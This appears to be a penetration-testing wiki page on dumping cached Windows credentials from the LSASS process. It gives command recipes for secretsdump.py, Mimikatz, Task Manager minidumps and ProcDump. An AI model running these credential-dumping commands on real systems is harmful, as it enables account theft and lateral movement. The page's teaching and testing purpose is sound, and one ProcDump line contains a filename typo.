# LSASS Credentials

The Local Security Authority Subsystem Service (LSASS) process manages various security-related functions in Windows, such as user authentication.

{% hint style="info" %}
LSASS (lsass.exe) is a process that implements many functions of the Local Security Authority (LSA).
{% endhint %}

When a domain user performs an interactive logon (physically or via RDP) to a computer, the user's credentials get cached in the LSASS Process in order to use Single Sign-On (SSO) when a [network logon](https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/windows-logon-scenarios#BKMK_NetworkLogon) is required to access services on the domain.

{% hint style="info" %}
Users authenticating remotely via NTLM or Kerberos authentication will not cache their credentials on the computer unless Kerberos delegation is enabled.
{% endhint %}

To access the LSASS Process memory to extract credentials, you must have a user account with *SeDebugPrivilege* on the target Windows computer. Most of the time, this means that you have access to an account with local administrator privileges on the computer.

{% hint style="info" %}
*SeDebugPrivilege* gives the ability to inspect and manipulate any process on the system, regardless of ownership or permissions.
{% endhint %}

There are many, many tools and research on ways an attacker can dump the LSASS process. Dumping LSASS is a much larger topic than what is mentioned here, especially once you look into protections against LSASS dumping and evading EDR.

Regardless, below are a few popular methods that may work on organizations that may not have executed any penetration tests.

{% tabs %}
{% tab title="secretsdump.py" %}
{% embed url="<https://github.com/fortra/impacket>" %}

{% code title="Linux (Attacker)" %}

```fish
secretsdump.py <domain/>[username]<:password><@computer> <options>

OPTIONS
-outputfile                 Base Output Filename
-hashes                     Authenticate Using LMHASH:NTHASH
-k                          Use Kerberos Auth From ccache File
```

{% endcode %}
{% endtab %}

{% tab title="Mimikatz" %}
{% embed url="<https://github.com/gentilkiwi/mimikatz>" %}

{% code title="Windows (Target Computer)" %}

```bash
## Run Mimikatz
mimikatz.exe

## Enable SeDebugPrivilege In Your Terminal
privilege::debug

## Dump LSASS Memory
sekurlsa::logonpasswords
```

{% endcode %}
{% endtab %}

{% tab title="Task Manager" %}
You can create a minidump of the *lsass.exe* process using the Task Manager running as administrator. Simply locate *lsass.exe*, right-click on it, and select *Create Dump File*. We can then use Mimikatz to read the dump.

{% code title="Linux/Windows" %}

```bash
## Switch Mimikatz context to the lsass.exe dump
sekurlsa::minidump [path to lsass dump]

## Dump Contents Of LSASS Dump
sekurlsa::logonpasswords
```

{% endcode %}
{% endtab %}

{% tab title="ProcDump" %}
{% embed url="<https://learn.microsoft.com/en-us/sysinternals/downloads/procdump>" %}

{% code title="Windows (Target Computer)" %}

```bash
## Dump LSASS Process
procdump.exe -accepteula -ma lsass.exe lsass.dmp

## Avoid Reading LSASS By Dumping Cloned LSASS Process
procdump.exe -accepteula -r -ma lsass.exe lsass.dm
```

{% endcode %}
{% endtab %}
{% endtabs %}